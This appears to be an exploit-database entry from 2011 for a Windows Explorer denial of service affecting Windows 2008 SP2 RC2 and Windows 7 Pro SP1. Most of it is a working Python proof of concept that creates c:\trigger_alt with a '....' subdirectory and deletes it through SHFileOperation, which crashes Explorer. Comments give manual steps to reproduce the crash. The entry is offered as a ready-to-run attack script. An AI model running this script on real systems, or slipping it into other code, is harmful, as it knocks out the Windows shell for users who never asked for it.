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Windows Explorer Denial Of Service

🗓️ 24 Dec 2011 00:00:00Reported by LevelType 
zdt
 zdt
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Windows Explorer Denial Of Service on Windows 2008 SP2 RC2 and Windows 7 Pro SP1 by triggering a file deletion issue using a specific directory structur

Code
# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack
 
from win32com.shell import shell, shellcon
from os import mkdir
 
try:
    mkdir("c:\\trigger_alt")
except:
    print "[!] Trigger Directory Exists"
try:
    mkdir("c:\\trigger_alt\\....")
except:
    print "[!] Trigger Sub Directory Exists"
 
print "[!] Triggering Issue"
 
# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete
 
shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))



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